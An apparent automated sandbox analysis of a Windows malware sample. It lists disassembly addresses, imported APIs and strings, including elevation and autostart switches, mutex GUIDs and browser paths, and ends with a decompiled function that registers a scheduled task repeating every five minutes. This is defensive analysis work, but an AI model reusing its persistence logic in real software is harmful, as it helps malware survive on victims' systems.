0x0041a9e1
0x0041a9e8
0x0041a9ef
0x0041a9f2
0x0041a9f9
0x0041a9ff
0x0041aa04
0x0041aa04
0x0041aa07
0x0041aa07
0x0041aa0a
0x0041aa0d
0x0041aa0d
0x0041aa12
0x0041aa12
0x0041aa14
0x0041a9fb
0x0041a9fb
0x0041a9fb
0x0041aa16
0x0041aa1e
0x0041aa29
0x0041aa2e
0x0041aa31
0x0041aa35
0x0041aa37
0x0041aa37
0x0041aa3e
0x0041aa44
0x0041aa49
0x0041aa4f
0x0041aa54
0x0041aa54
0x0041aa57
0x0041aa5f
0x0041aa65
0x0041aa6a
0x0041aa6a
0x0041aa70
0x0041aa70
0x0041aa73
0x0041aa76
0x0041aa76
0x0041aa7b
0x0041aa7b
0x0041aa7d
0x0041aa61
0x0041aa61
0x0041aa61
0x0041aa7f
0x0041aa8b
0x0041aa9b
0x0041aaa0
0x0041aaa4
0x0041aaa7
0x0041aab2
0x0041aab2
0x0041aab4
0x0041aabf
0x0041aac7
0x0041aac7
0x0041aaca
0x0041aacd
0x0041aad3
0x0041aad5
0x0041aad8
0x0041aad8
0x0041aada
0x0041aadb
0x0041aadb
0x0041aadf
0x0041aadf
0x0041aacf
0x0041aacf
0x0041aacf
0x0041aae1
0x0041aaea
0x0041aaef
0x0041aaf0
0x0041aaf0
0x0041aaf5
0x0041aaff
0x0041ab03
0x0041ab07
0x0041ab0e
0x0041ab16
0x0041ab18
0x0041ab2c
0x0041ab2e
0x0041ab34
0x0041ab37
0x0041ab39
0x0041ab3b
0x0041ab3f
0x0041ab43
0x0041ab48
0x0041ab48
0x0041ab4d
0x0041ab54
0x0041ab5b
0x0041ab5e
0x0041ab62
0x0041ab7b
0x0041ab7d
0x0041ab64
0x0041ab67
0x0041ab67
0x0041ab68
0x0041ab6f
0x0041ab74
0x0041ab74
0x0041ab68
0x0041ab86
0x0041ab8c
0x0041ab8f
0x0041ab91
0x0041ab98
0x0041ab9f
0x0041ab9f
0x0041aba2
0x0041aba7
0x0041abad
0x0041abb2
0x0041abb2
0x0041abc0
0x0041abc5
0x0041abc9
0x0041abcc
0x0041abd7
0x0041abd7
0x0041abd9
0x0041abe4
0x0041abf0
0x0041abf0
0x0041abf3
0x0041abf6
0x0041abfc
0x0041abfe
0x0041ac01
0x0041ac01
0x0041ac03
0x0041ac04
0x0041ac04
0x0041ac08
0x0041ac08
0x0041abf8
0x0041abf8
0x0041abf8
0x0041ac0a
0x0041ac13
0x0041ac18
0x0041ac19
0x0041ac19
0x0041ac1e
0x0041ac28
0x0041ac2c
0x0041ac30
0x0041ac37
0x0041ac3f
0x0041ac41
0x0041ac55
0x0041ac57
0x0041ac5d
0x0041ac60
0x0041ac62
0x0041ac64
0x0041ac68
0x0041ac6c
0x0041ac71
0x0041ac71
0x0041ac76
0x0041ac7d
0x0041ac84
0x0041ac87
0x0041ac8b
0x0041aca4
0x0041aca6
0x0041ac8d
0x0041ac90
0x0041ac90
0x0041ac91
0x0041ac98
0x0041ac9d
0x0041ac9d
0x0041ac91
0x0041acaf
0x0041acb5
0x0041acb8
0x0041acba
0x0041acc1
0x0041acc8
0x0041acc8
0x0041accb
0x0041acd0
0x0041acd6
0x0041acdb
0x0041acdb
0x0041ace9
0x0041acee
0x0041acf2
0x0041acf5
0x0041ad00
0x0041ad00
0x0041ad02
0x0041ad0d
0x0041ad15
0x0041ad15
0x0041ad18
0x0041ad1b
0x0041ad21
0x0041ad23
0x0041ad26
0x0041ad26
0x0041ad28
0x0041ad29
0x0041ad29
0x0041ad2d
0x0041ad2d
0x0041ad1d
0x0041ad1d
0x0041ad1d
0x0041ad2f
0x0041ad38
0x0041ad3d
0x0041ad3e
0x0041ad3e
0x0041ad43
0x0041ad4d
0x0041ad51
0x0041ad55
0x0041ad5c
0x0041ad64
0x0041ad66
0x0041ad71
0x0041ad76
0x0041ad7a
0x0041ad7c
0x0041ad7f
0x0041ad85
0x0041ad87
0x0041ad89
0x0041ad8d
0x0041ad91
0x0041ad96
0x0041ad96
0x0041ad9b
0x0041ada2
0x0041ada9
0x0041adac
0x0041adb0
0x0041adc9
0x0041adcb
0x0041adb2
0x0041adb5
0x0041adb5
0x0041adb6
0x0041adbd
0x0041adc2
0x0041adc2
0x0041adb6
0x0041add4
0x0041adda
0x0041addd
0x0041addf
0x0041ade6
0x0041aded
0x0041aded
0x0041adf0
0x0041adf5
0x0041adfb
0x0041ae00
0x0041ae00
0x0041ae03
0x0041ae07
0x0041ae18
0x0041ae20
0x0041ae25
0x0041ae2e
0x0041ae37
0x0041ae3c
0x0041ae41
0x0041ae47
0x0041ae4c
0x0041ae4c
0x0041ae4f
0x0041ae53
0x0041ae64
0x0041ae6c
0x0041ae71
0x0041ae7d
0x0041ae82
0x0041ae87
0x0041ae8d
0x0041ae92
0x0041ae92
0x0041ae95
0x0041ae99
0x0041aeaa
0x0041aeb2
0x0041aeb7
0x0041aec3
0x0041aec8
0x0041aecd
0x0041aed3
0x0041aed8
0x0041aed8
0x0041aedb
0x0041aedf
0x0041aef0
0x0041aef8
0x0041aefd
0x0041af09
0x0041af0e
0x0041af13
0x0041af19
0x0041af1e
0x0041af1e
0x0041af21
0x0041af25
0x0041af36
0x0041af3e
0x0041af43
0x0041af4f
0x0041af54
0x0041af59
0x0041af5f
0x0041af64
0x0041af64
0x0041af67
0x0041af6b
0x0041af7c
0x0041af84
0x0041af89
0x0041af95
0x0041af9a
0x0041af9f
0x0041afa5
0x0041afaa
0x0041afaa
0x0041afad
0x0041afb1
0x0041afc2
0x0041afca
0x0041afcf
0x0041afdb
0x0041afe0
0x0041afe5
0x0041afeb
0x0041aff0
0x0041aff0
0x0041affc
0x0041b00e
0x0041b01a
0x0041b020
0x0041b029
0x0041b037
0x0041b045
0x0041b04c
0x0041b04c
0x0041b054
0x0041b05d
0x0041b06b
0x0041b077
0x0041b080
0x0041b08e
0x0041b09a
0x0041b0a3
0x0041b0b1
0x0041b0bd
0x0041b0c6
0x0041b0d4
0x0041b0e0
0x0041b0e9
0x0041b0f7
0x0041b103
0x0041b10c
0x0041b111
0x0041b111
0x0041b11b
0x0041b120
0x0041b124
0x0041b12b
0x0041b130
0x0041b136
0x0041b13f
0x0041b13f
0x0041b150
0x0041b159
0x0041b169
0x0041b16e
0x0041b178
0x0041b17d
0x0041b181
0x0041b190
0x0041b19a
0x0041b19f
0x0041b1a0
0x0041b1a0
0x0041b1a9
0x0041b1ba
0x0041b1c4
0x0041b1c9
0x0041b1d3
0x0041b1d8
0x0041b1e5
0x0041b1ee
0x0041b1f3
0x0041b20a
0x0041b21d
0x0041b222
0x0041b224
0x0041b230
0x0041b23b
0x0041b240
0x0041b246
0x0041b251
0x0041b259
0x0041b260
0x0041b269
0x0041b27d
0x0041b28c
0x0041b291
0x0041b297
0x0041b299
0x0041b29f
0x0041b2af
0x0041b2b4
0x0041b2bb
0x0041b2c7
0x0041b2d0
0x0041b2e8
0x0041b2ed
0x0041b2ed
0x0041b230
0x0041b2fd
0x0041b303
0x0041b30c
0x0041b314
0x0041b31d
0x0041b322
0x0041b336
0x0041b33e
0x0041b346
0x0041b34b
0x0041b34d
0x0041b35f
0x0041b369
0x0041b36b
0x0041b374
0x0041b389
0x0041b392
0x0041b3a0
0x0041b3ae
0x0041b3b7
0x0041b3c5
0x0041b3dd
0x0041b3e2
0x0041b3e4
0x0041b3ea
0x0041b3f0
0x0041b3fa
0x0041b40c
0x0041b418
0x0041b41d
0x0041b422
0x0041b428
0x0041b42d
0x0041b43d
0x0041b443
0x0041b449
0x0041b44f
0x0041b45d
0x0041b466
0x0041b47e
0x0041b483
0x0041b483
0x0041b3f0
0x0041b495
0x0041b49a
0x0041b4b3
0x0041b4bb
0x0041b4bd
0x0041b4c5
0x0041b4cd
0x0041b4d7
0x0041b4e7
0x0041b4e9
0x0041b4e9
0x0041b4c5
0x0041b4ed
0x0041b4fe
0x0041b500
0x0041b509
0x0041b510
0x0041b520
0x0041b522
0x0041b524
0x0041b526
0x0041b52e
0x0041b540
0x0041b542
0x0041b542
0x0041b526
0x0041b54e
0x0041b554
0x0041b554
0x0041b510
0x0041b55b
0x0041b560
0x0041b562
0x0041b56b
0x0041b570
0x0041b580
0x0041b582
0x0041b584
0x0041b586
0x0041b58e
0x0041b5a0
0x0041b5a2
0x0041b5a2
0x0041b586
0x0041b5ae
0x0041b5b4
0x0041b5b4
0x0041b570
0x0041b5bb
0x0041b5c2
0x0041b5c7
0x0041b5c9
0x0041b5c9
0x0041b5ce
0x0041b5d0
0x0041b5d3
0x0041b5d3
0x0041b5d9
0x0041b5e4
0x0041b34f
0x0041b34f
0x0041b34f
0x0041b5ed
0x0041b5f9
0x0041b605
0x0041b611
0x0041b61d
0x0041a9d1
0x0041a9d1
0x0041a9d1
0x0041b629
0x0041a624
0x0041a624
0x0041a62a
0x0041a62c
0x00000000
0x0041a632
0x0041a63f
0x0041a652
0x0041a661
0x0041a66f
0x0041a67b
0x0041a686
0x0041a68d
0x0041a697
0x0041a6a2
0x0041a6a9
0x0041a6ac
0x0041a6b0
0x0041a6b2
0x0041a6b2
0x0041a6b4
0x0041a6c3
0x0041a6ce
0x0041a6d9
0x0041a6df
0x0041a6e1
0x0041a6fe
0x0041a6fe
0x00000000
0x0041a6e3
0x0041a6e3
0x0041a6e3
0x0041a6e1
0x0041a62c
0x0041a61e
0x0041a612
0x0041a60a
0x0041b635
0x0041b641
0x0041b64d
0x0041b659
0x0041b666
0x0041a466
0x0041a46d
0x0041a46f
0x0041a47c
0x0041a47c
0x0041a196
0x0041a196
0x0041a19d
0x0041a1a1
0x0041a1a7
0x0041a1b4
0x0041a1bc
0x0041a1c1
0x0041a1c4
0x0041a1c6
0x0041a1ca
0x00000000
0x00000000
0x0041a1df
0x0041a1eb
0x0041a1f3
0x0041a201
0x0041a20b
0x0041a20e
0x0041a217
0x0041a21a
0x0041a21f
0x0041a222
0x0041a226
0x0041a323
0x0041a323
0x0041a328
0x0041a32c
0x0041a32f
0x0041a333
0x0041a337
0x0041a1b0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a22e
0x0041a236
0x0041a23b
0x0041a23e
0x0041a240
0x0041a244
0x0041a2d5
0x0041a2da
0x0041a2dd
0x0041a2df
0x0041a2f4
0x0041a2f9
0x0041a2fc
0x0041a2fe
0x0041a313
0x0041a318
0x0041a31b
0x0041a31d
0x0041a361
0x0041a371
0x0041a373
0x0041a380
0x0041a38f
0x0041a395
0x0041a3a3
0x0041a3a5
0x0041a3a7
0x00000000
0x00000000
0x0041a3af
0x0041a3b8
0x0041a3c7
0x0041a3c9
0x00000000
0x0041a3cb
0x0041a3cb
0x0041a3d0
0x0041a3d2
0x0041a3e3
0x0041a3f0
0x0041a3f2
0x0041a3ff
0x0041a3d4
0x0041a3d6
0x0041a3dc
0x00000000
0x0041a3dc
0x0041a3d2
0x00000000
0x0041a3c9
0x0041a406
0x0041a40e
0x0041a41b
0x0041a41d
0x0041a42b
0x0041a436
0x0041a43d
0x0041a44a
0x0041a44c
0x0041a459
0x00000000
0x00000000
0x00000000
0x0041a300
0x0041a300
0x00000000
0x0041a300
0x0041a2e1
0x0041a2e1
0x0041a31f
0x0041a31f
0x00000000
0x0041a31f
0x0041a24a
0x0041a24e
0x0041a25a
0x0041a267
0x0041a282
0x0041a28c
0x0041a293
0x0041a2a8
0x0041a2b2
0x0041a2b9
0x0041a2be
0x0041a2c1
0x0041a2c4
0x0041a2c8
0x00000000
0x0041a2c8
0x00000000
0x0041a244
0x0041a1b4
0x0041a190
0x0041a05f
0x00419fb4
0x00419fb4
0x00419fc1
0x00419fc1
0x00000000

APIs

Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6

GetCurrentProcess.KERNEL32 ref: 00419FC4
GetLastError.KERNEL32 ref: 00419FD2
SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
GetLastError.KERNEL32 ref: 00419FE4
GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,005CD750,?), ref: 0041A0BB
PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
GetCommandLineW.KERNEL32(?,?), ref: 0041A161

Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C

Strings

IsAutoStart, xrefs: 0041A1D0, 0041A273
C:\Program Files\Mozilla Firefox\, xrefs: 0041AF2D
--Admin, xrefs: 0041A1B4, 0041A632
C:\Windows\, xrefs: 0041AE0F
D:\Program Files (x86)\Mozilla Firefox\, xrefs: 0041B02E
--AutoStart, xrefs: 0041A2EC
C:\Program Files\Internet Explorer\, xrefs: 0041AF73
C:\Program Files (x86)\Internet Explorer\, xrefs: 0041AEA1
D:\Program Files\Internet Explorer\, xrefs: 0041B0CB
<, xrefs: 0041A67B
%username%, xrefs: 0041B283
--ForNetRes, xrefs: 0041A22E
{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}, xrefs: 0041A8A0
x2Q, xrefs: 0041A856
list<T> too long, xrefs: 0041B669, 0041B673
IsTask, xrefs: 0041A1EE, 0041A299
I:\5d2860c89d774.jpg, xrefs: 0041B32F
7P, xrefs: 0041B164
--Task, xrefs: 0041A2CD
{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}, xrefs: 0041A8B6
C:\Program Files (x86)\Mozilla Firefox\, xrefs: 0041AE5B
x*P, xrefs: 0041ACE4
C:\Program Files (x86)\Google\, xrefs: 0041AEE7
C:\Program Files\Google\, xrefs: 0041AFB9
F:\, xrefs: 0041B397
--Service, xrefs: 0041A30B
runas, xrefs: 0041A6CE
D:\Program Files\Mozilla Firefox\, xrefs: 0041B0A8
IsNotAutoStart, xrefs: 0041A645
D:\Windows\, xrefs: 0041AFF3
D:\Program Files (x86)\Google\, xrefs: 0041B085
IsNotTask, xrefs: 0041A654
X1P, xrefs: 0041A485
D:\Program Files (x86)\Internet Explorer\, xrefs: 0041B062
D:\Program Files\Google\, xrefs: 0041B0EE

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
API String ID: 2957410896-3144399390
Opcode ID: 95e54b98415b17d84fbc8f844b6c29419ac9bb52063bbcc78c0645f640fd712b
Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
Opcode Fuzzy Hash: 95e54b98415b17d84fbc8f844b6c29419ac9bb52063bbcc78c0645f640fd712b
Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 0040D240 Relevance: 56.7, APIs: 24, Strings: 8, Instructions: 702
comCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0040D240(void* __ecx, char _a4, intOrPtr _a24) {
				char _v8;
				intOrPtr _v16;
				void* _v20;
				void* _v24;
				char _v28;
				void* _v32;
				char _v33;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				char _v92;
				void* _v96;
				char _v100;
				char _v104;
				short _v120;
				char _v140;
				char _v156;
				char _v172;
				char _v228;
				char _v244;
				char _v324;
				long _v1348;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t222;
				short _t226;
				short _t243;
				intOrPtr* _t248;
				intOrPtr* _t249;
				intOrPtr* _t250;
				short _t251;
				intOrPtr* _t253;
				intOrPtr* _t254;
				intOrPtr* _t255;
				intOrPtr* _t258;
				short _t259;
				intOrPtr* _t261;
				intOrPtr* _t263;
				intOrPtr* _t265;
				intOrPtr* _t267;
				intOrPtr* _t268;
				intOrPtr* _t269;
				short _t270;
				intOrPtr* _t273;
				short _t274;
				intOrPtr* _t275;
				short _t276;
				intOrPtr* _t278;
				short _t279;
				intOrPtr* _t280;
				short _t281;
				intOrPtr* _t283;
				intOrPtr* _t285;
				intOrPtr* _t286;
				intOrPtr* _t287;
				short _t288;
				intOrPtr* _t291;
				short _t292;
				intOrPtr* _t293;
				short _t294;
				intOrPtr* _t296;
				short _t297;
				intOrPtr* _t299;
				intOrPtr* _t301;
				intOrPtr* _t302;
				intOrPtr* _t303;
				short _t304;
				intOrPtr* _t306;
				intOrPtr* _t307;
				intOrPtr* _t308;
				short _t309;
				intOrPtr* _t311;
				intOrPtr* _t313;
				intOrPtr* _t314;
				intOrPtr* _t315;
				short _t316;
				intOrPtr* _t318;
				intOrPtr* _t319;
				intOrPtr* _t320;
				short _t321;
				void* _t327;
				intOrPtr* _t332;
				intOrPtr* _t333;
				intOrPtr* _t334;
				intOrPtr* _t335;
				short _t336;
				intOrPtr* _t340;
				short _t341;
				intOrPtr* _t342;
				short _t343;
				intOrPtr* _t345;
				short _t346;
				intOrPtr* _t350;
				intOrPtr* _t351;
				short _t352;
				intOrPtr* _t354;
				intOrPtr* _t355;
				intOrPtr* _t356;
				short _t357;
				intOrPtr* _t365;
				intOrPtr* _t378;
				intOrPtr* _t380;
				intOrPtr* _t382;
				intOrPtr* _t386;
				intOrPtr* _t388;
				intOrPtr* _t390;
				intOrPtr* _t392;
				void* _t394;
				char _t395;
				intOrPtr* _t397;
				intOrPtr* _t398;
				intOrPtr* _t402;
				intOrPtr* _t410;
				intOrPtr* _t417;
				intOrPtr* _t420;
				intOrPtr* _t423;
				intOrPtr* _t428;
				intOrPtr* _t431;
				intOrPtr* _t433;
				intOrPtr* _t454;
				intOrPtr* _t457;
				intOrPtr* _t459;
				intOrPtr* _t466;
				intOrPtr* _t469;
				short _t479;
				short _t480;
				short _t484;
				short _t491;
				short _t499;
				short _t500;
				short _t501;
				short _t502;
				short _t504;
				intOrPtr* _t511;
				short _t512;
				short _t513;
				void* _t516;
				void* _t517;
				void* _t519;
				intOrPtr* _t540;
				short _t541;
				short _t542;
				intOrPtr _t543;
				void* _t544;

				_t222 =  *[fs:0x0];
				 *[fs:0x0] = _t543;
				_t544 = _t543 - 0x538;
				_t517 = __ecx;
				_v8 = 0;
				__imp__CoInitialize(0, _t516, _t519, _t394, _t222, 0x4ca928, 0xffffffff); // executed
				if(_t222 >= 0) {
					__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 6, 3, 0, 0, 0); // executed
					_v100 = 7;
					_v120 = 0;
					_v104 = 0;
					E00414690(_t394,  &_v120,  &_a4, 0);
					_t226 =  &_v32;
					_v8 = 1;
					_v32 = 0;
					__imp__CoCreateInstance(0x4d506c, 0, 1, 0x4d4fec, _t226, 0xffffffff); // executed
					__eflags = _t226;
					if(_t226 < 0) {
						L74:
						__imp__CoUninitialize();
						_t395 = 0;
					} else {
						_t397 = __imp__#8;
						 *_t397( &_v156);
						asm("movdqu xmm0, [ebp-0x98]");
						asm("movdqu [ebp-0xb8], xmm0");
						 *_t397( &_v140);
						asm("movdqu xmm0, [ebp-0x88]");
						asm("movdqu [ebp-0xc8], xmm0");
						 *_t397( &_v172);
						asm("movdqu xmm0, [ebp-0xa8]");
						asm("movdqu [ebp-0xd8], xmm0");
						 *_t397( &_v244);
						_v8 = 5;
						asm("movdqu xmm0, [ebp-0xb8]");
						_t402 = _v32;
						asm("movdqu [eax], xmm0");
						asm("movdqu xmm0, [ebp-0xc8]");
						asm("movdqu [eax], xmm0");
						_t544 = _t544 - 0xffffffffffffffe0;
						asm("movdqu xmm0, [ebp-0xd8]");
						asm("movdqu [eax], xmm0");
						asm("movdqu xmm0, [ebp-0xf0]");
						asm("movdqu [eax], xmm0"); // executed
						_t243 =  *((intOrPtr*)( *_t402 + 0x28))(_t402);
						__imp__#9( &_v244);
						__imp__#9( &_v172);
						__imp__#9( &_v140);
						_v8 = 1;
						__imp__#9( &_v156);
						__eflags = _t243;
						if(__eflags >= 0) {
							_v24 = 0;
							_t248 = E0040B140(_t397,  &_v28, __eflags, "\\");
							_v8 = 6;
							_t249 =  *_t248;
							__eflags = _t249;
							if(_t249 == 0) {
								_t479 = 0;
								__eflags = 0;
							} else {
								_t479 =  *_t249;
							}
							_t250 = _v32;
							_t251 =  *((intOrPtr*)( *_t250 + 0x1c))(_t250, _t479,  &_v24);
							_v8 = 1;
							E0040B1D0( &_v28, _t479);
							__eflags = _t251;
							if(__eflags >= 0) {
								_t253 = E0040B140(_t397,  &_v28, __eflags, L"Time Trigger Task");
								_v8 = 7;
								_t254 =  *_t253;
								__eflags = _t254;
								if(_t254 == 0) {
									_t480 = 0;
									__eflags = 0;
								} else {
									_t480 =  *_t254;
								}
								_t255 = _v24;
								 *((intOrPtr*)( *_t255 + 0x3c))(_t255, _t480, 0);
								_v8 = 1;
								E0040B1D0( &_v28, _t480);
								_t258 = _v32;
								_v20 = 0;
								_t259 =  *((intOrPtr*)( *_t258 + 0x24))(_t258, 0,  &_v20);
								_t410 = _v32;
								 *((intOrPtr*)( *_t410 + 8))(_t410);
								__eflags = _t259;
								if(_t259 >= 0) {
									_t261 = _v20;
									_v64 = 0;
									__eflags =  *((intOrPtr*)( *_t261 + 0x1c))(_t261,  &_v64);
									if(__eflags < 0) {
										L73:
										_t263 = _v24;
										 *((intOrPtr*)( *_t263 + 8))(_t263);
										_t265 = _v20;
										 *((intOrPtr*)( *_t265 + 8))(_t265);
										goto L74;
									} else {
										_t267 = E0040B140(_t397,  &_v28, __eflags, L"Author Name");
										_v8 = 8;
										_t268 =  *_t267;
										__eflags = _t268;
										if(_t268 == 0) {
											_t484 = 0;
											__eflags = 0;
										} else {
											_t484 =  *_t268;
										}
										_t269 = _v64;
										_t270 =  *((intOrPtr*)( *_t269 + 0x28))(_t269, _t484);
										_v8 = 1;
										E0040B1D0( &_v28, _t484);
										_t417 = _v64;
										 *((intOrPtr*)( *_t417 + 8))(_t417);
										__eflags = _t270;
										if(_t270 < 0) {
											goto L73;
										} else {
											_t273 = _v20;
											_v56 = 0;
											_t274 =  *((intOrPtr*)( *_t273 + 0x3c))(_t273,  &_v56);
											__eflags = _t274;
											if(_t274 < 0) {
												goto L73;
											} else {
												_t275 = _v56;
												_t276 =  *((intOrPtr*)( *_t275 + 0x38))(_t275, 3);
												_t420 = _v56;
												 *((intOrPtr*)( *_t420 + 8))(_t420);
												__eflags = _t276;
												if(_t276 < 0) {
													goto L73;
												} else {
													_t278 = _v20;
													_v48 = 0;
													_t279 =  *((intOrPtr*)( *_t278 + 0x2c))(_t278,  &_v48);
													__eflags = _t279;
													if(_t279 < 0) {
														goto L73;
													} else {
														_t280 = _v48;
														_t281 =  *((intOrPtr*)( *_t280 + 0x58))(_t280, 0xffffffff);
														_t423 = _v48;
														 *((intOrPtr*)( *_t423 + 8))(_t423);
														__eflags = _t281;
														if(_t281 < 0) {
															goto L73;
														} else {
															_t283 = _v48;
															_v76 = 0;
															__eflags =  *((intOrPtr*)( *_t283 + 0x9c))(_t283,  &_v76);
															if(__eflags < 0) {
																goto L73;
															} else {
																_t285 = E0040B140(_t397,  &_v28, __eflags, L"PT5M");
																_v8 = 9;
																_t286 =  *_t285;
																__eflags = _t286;
																if(_t286 == 0) {
																	_t491 = 0;
																	__eflags = 0;
																} else {
																	_t491 =  *_t286;
																}
																_t287 = _v76;
																_t288 =  *((intOrPtr*)( *_t287 + 0x28))(_t287, _t491);
																_v8 = 1;
																E0040B1D0( &_v28, _t491);
																_t428 = _v76;
																 *((intOrPtr*)( *_t428 + 8))(_t428);
																__eflags = _t288;
																if(_t288 < 0) {
																	goto L73;
																} else {
																	_t291 = _v20;
																	_v80 = 0;
																	_t292 =  *((intOrPtr*)( *_t291 + 0x24))(_t291,  &_v80);
																	__eflags = _t292;
																	if(_t292 < 0) {
																		goto L73;
																	} else {
																		_t293 = _v80;
																		_v68 = 0;
																		_t294 =  *((intOrPtr*)( *_t293 + 0x28))(_t293, 1,  &_v68);
																		_t431 = _v80;
																		 *((intOrPtr*)( *_t431 + 8))(_t431);
																		__eflags = _t294;
																		if(_t294 < 0) {
																			goto L73;
																		} else {
																			_t296 = _v68;
																			_v40 = 0;
																			_t297 =  *((intOrPtr*)( *_t296))(_t296, 0x4d50ec,  &_v40);
																			_t433 = _v68;
																			 *((intOrPtr*)( *_t433 + 8))(_t433);
																			__eflags = _t297;
																			if(_t297 < 0) {
																				goto L73;
																			} else {
																				_t299 = _v40;
																				__eflags =  *((intOrPtr*)( *_t299 + 0x28))(_t299,  &_v60);
																				if(__eflags < 0) {
																					goto L73;
																				} else {
																					_t301 = E0040B140(_t397,  &_v28, __eflags, L"PT5M");
																					_v8 = 0xa;
																					_t302 =  *_t301;
																					__eflags = _t302;
																					if(_t302 == 0) {
																						_t499 = 0;
																						__eflags = 0;
																					} else {
																						_t499 =  *_t302;
																					}
																					_t303 = _v60;
																					_t304 =  *((intOrPtr*)( *_t303 + 0x20))(_t303, _t499);
																					_v8 = 1;
																					E0040B1D0( &_v28, _t499);
																					__eflags = _t304;
																					if(__eflags < 0) {
																						goto L73;
																					} else {
																						_t306 = E0040B140(_t397,  &_v28, __eflags, 0x500078);
																						_v8 = 0xb;
																						_t307 =  *_t306;
																						__eflags = _t307;
																						if(_t307 == 0) {
																							_t500 = 0;
																							__eflags = 0;
																						} else {
																							_t500 =  *_t307;
																						}
																						_t308 = _v60;
																						_t309 =  *((intOrPtr*)( *_t308 + 0x28))(_t308, _t500);
																						_v8 = 1;
																						E0040B1D0( &_v28, _t500);
																						__eflags = _t309;
																						if(_t309 < 0) {
																							goto L73;
																						} else {
																							_t311 = _v40;
																							__eflags =  *((intOrPtr*)( *_t311 + 0x2c))(_t311, _v60);
																							if(__eflags < 0) {
																								goto L73;
																							} else {
																								_t313 = E0040B140(_t397,  &_v28, __eflags, L"Trigger1");
																								_v8 = 0xc;
																								_t314 =  *_t313;
																								__eflags = _t314;
																								if(_t314 == 0) {
																									_t501 = 0;
																									__eflags = 0;
																								} else {
																									_t501 =  *_t314;
																								}
																								_t315 = _v40;
																								_t316 =  *((intOrPtr*)( *_t315 + 0x24))(_t315, _t501);
																								_v8 = 1;
																								E0040B1D0( &_v28, _t501);
																								__eflags = _t316;
																								if(__eflags < 0) {
																									goto L73;
																								} else {
																									_t318 = E0040B140(_t397,  &_v28, __eflags, L"2030-05-02T08:00:00");
																									_v8 = 0xd;
																									_t319 =  *_t318;
																									__eflags = _t319;
																									if(_t319 == 0) {
																										_t502 = 0;
																										__eflags = 0;
																									} else {
																										_t502 =  *_t319;
																									}
																									_t320 = _v40;
																									_t321 =  *((intOrPtr*)( *_t320 + 0x44))(_t320, _t502);
																									_v8 = 1;
																									E0040B1D0( &_v28, _t502);
																									__eflags = _t321;
																									if(__eflags < 0) {
																										goto L73;
																									} else {
																										E00423AAF( &_v28, _t502, __eflags,  &_v92);
																										asm("cdq");
																										_v92 = _v92 + _t517;
																										asm("adc [ebp-0x54], edx"); // executed
																										_t327 = E00423551( &_v92); // executed
																										E004228E0( &_v324, 0x50, "%Y-%m-%dT%H:%M:%S", _t327);
																										_v33 = 0;
																										E00412C40(_t544, _t517,  &_v324);
																										_t332 = E00412900( &_v228, _v33); // executed
																										_t544 = _t544 + 0x18;
																										_v8 = 0xe;
																										__eflags =  *((intOrPtr*)(_t332 + 0x14)) - 8;
																										if(__eflags >= 0) {
																											_t332 =  *_t332;
																										}
																										_t333 = E0040B140(_t397,  &_v28, __eflags, _t332);
																										_v8 = 0xf;
																										_t334 =  *_t333;
																										__eflags = _t334;
																										if(_t334 == 0) {
																											_t504 = 0;
																											__eflags = 0;
																										} else {
																											_t504 =  *_t334;
																										}
																										_t335 = _v40;
																										_t336 =  *((intOrPtr*)( *_t335 + 0x3c))(_t335, _t504);
																										E0040B1D0( &_v28, _t504);
																										_v8 = 1;
																										E00413210( &_v228);
																										_t454 = _v40;
																										 *((intOrPtr*)( *_t454 + 8))(_t454);
																										__eflags = _t336;
																										if(_t336 < 0) {
																											goto L73;
																										} else {
																											_t340 = _v20;
																											_v52 = 0;
